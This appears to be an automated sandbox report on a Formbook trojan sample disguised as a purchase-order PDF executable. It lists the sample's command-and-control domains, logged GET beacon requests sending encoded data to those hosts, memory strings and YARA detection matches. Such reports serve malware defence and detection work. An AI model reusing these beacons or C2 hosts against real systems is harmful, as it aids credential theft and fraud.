          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 22 Aug 2023 11:43:19 GMTContent-Type: text/htmlContent-Length: 291ETag: "64e2b129-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Aug 2023 11:43:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=niAMAwxlvWA95QIpUhUVUJLcGS33J%2FBi9wGcg3FG%2Fb%2BTmuDY91rzpYqRzr%2FwLuB%2Fnogc8EePl5AUiE7eHZdQCuucl8RqktnK1%2FmCVX9lR%2BHT6kH7z6Q%2BdmfyPZE1rZTD2gM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7faadc0e7b6a3a7e-FRAalt-svc: h3=":443"; ma=86400Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 22 Aug 2023 11:45:18 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: PO-230821_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1wapws.top
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1wapws.top/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1wapws.top/sn26/www.ymjblnvo.cfd
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1wapws.topReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.4tbbwa.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.4tbbwa.com/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.4tbbwa.com/sn26/www.ahevrlh.xyz
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.4tbbwa.comReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.974dp.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.974dp.com/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.974dp.com/sn26/www.bmmboo.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.974dp.comReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ahevrlh.xyz
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ahevrlh.xyz/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ahevrlh.xyz/sn26/www.thirdmind.network
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ahevrlh.xyzReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bmmboo.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bmmboo.com/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bmmboo.com/sn26/www.ownlegalhelp.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bmmboo.comReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.canada-reservation.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.canada-reservation.com/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.canada-reservation.com/sn26/www.kentuckywalkabout.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.canada-reservation.comReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kentuckywalkabout.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kentuckywalkabout.com/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kentuckywalkabout.com/sn26/www.qcdrxwr.cfd
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kentuckywalkabout.comReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ownlegalhelp.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ownlegalhelp.com/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ownlegalhelp.com/sn26/www.4tbbwa.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ownlegalhelp.comReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qcdrxwr.cfd
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qcdrxwr.cfd/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qcdrxwr.cfd/sn26/www.uedam.xyz
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qcdrxwr.cfdReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewhiteorchidspa.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewhiteorchidspa.com/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewhiteorchidspa.com/sn26/www.zachmahl.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewhiteorchidspa.comReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thirdmind.network
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thirdmind.network/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thirdmind.network/sn26/www.thewhiteorchidspa.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thirdmind.networkReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uahrbqtj.cfd
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uahrbqtj.cfd/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uahrbqtj.cfd/sn26/www.wdlzzfkc.cfd
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uahrbqtj.cfdReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uedam.xyz
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uedam.xyz/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uedam.xyz/sn26/www.1wapws.top
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uedam.xyzReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wdlzzfkc.cfd
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wdlzzfkc.cfd/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wdlzzfkc.cfd/sn26/www.canada-reservation.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wdlzzfkc.cfdReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ymjblnvo.cfd
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ymjblnvo.cfd/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ymjblnvo.cfd/sn26/lJ
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ymjblnvo.cfdReferer:
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zachmahl.com
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zachmahl.com/sn26/
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zachmahl.com/sn26/www.uahrbqtj.cfd
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zachmahl.comReferer:
          Source: explorer.exe, 00000003.00000002.3554856830.0000000001182000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1092924750.0000000001182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com)
          Source: explorer.exe, 00000003.00000002.3605338155.0000000008980000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008980000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000002.3605338155.0000000008980000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008980000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000003.00000002.3605338155.0000000008980000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008980000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000002.3618557248.000000001104F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.3586242092.000000000542F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=thirdmind.network
          Source: explorer.exe, 00000003.00000002.3605338155.0000000008980000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008980000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000003.00000002.3618557248.000000001104F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.3586242092.000000000542F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
          Source: unknownDNS traffic detected: queries for: www.974dp.com
          Source: C:\Windows\explorer.exeCode function: 3_2_11396F82 getaddrinfo,setsockopt,recv,3_2_11396F82
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi HTTP/1.1Host: www.974dp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpi HTTP/1.1Host: www.bmmboo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpi HTTP/1.1Host: www.ownlegalhelp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=CpYCJqaIXUbm3IVdfGXcfWVbwpqiZyf/2rRsJh0RGmHsf115fz67BvVx/+oGOa6+KG1D&ML0tl=NZlpi HTTP/1.1Host: www.4tbbwa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=K4V3qd++KPCvHN0rtQuWoGyJj5p2Mca2XR5lWleZSjXEQHmkvvLfGF2tUiVxqdSsVX/P&ML0tl=NZlpi HTTP/1.1Host: www.ahevrlh.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=JTmN6zoWWGNjq6ib/pFFv2cag4i5j1OLo1K7cxhy0Qg9CF/c4lTnOzzR4r51HW/WUnmz&ML0tl=NZlpi HTTP/1.1Host: www.thirdmind.networkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=pgVZ8pYUx/mb3SHekAxrqKnjfvNT295Kch72LXoG5YoxLYYfuZ6zPfF7UahT16hGXPUe&ML0tl=NZlpi HTTP/1.1Host: www.thewhiteorchidspa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=ueTspPcvStQ4P/B/BGMviMSUI7+26iAWBkDAplOqW0XstMbPZQlOryCbf8ldO6To/Dtn&ML0tl=NZlpi HTTP/1.1Host: www.uahrbqtj.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
